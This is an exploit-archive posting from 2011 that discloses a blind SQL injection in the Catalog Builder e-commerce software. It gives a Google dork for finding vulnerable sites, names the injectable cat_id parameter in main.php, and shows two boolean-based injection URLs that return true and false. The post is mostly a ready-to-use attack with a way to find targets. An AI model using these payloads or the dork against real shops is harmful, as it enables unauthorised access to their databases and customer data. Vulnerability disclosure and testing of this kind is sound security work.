[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Catalog Builder - Ecommerce Software - Blind SQL Injection
# Published : 2011-06-16
# Author :
# Previous Title : PHPortfolio SQL Injection Vulnerbility
# Next Title : vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
+------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: takeshix.query@googlemail.com
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------
vulnerable url:
/catalog/main.php?cat_id=[blind sqli]
example:
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false
--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+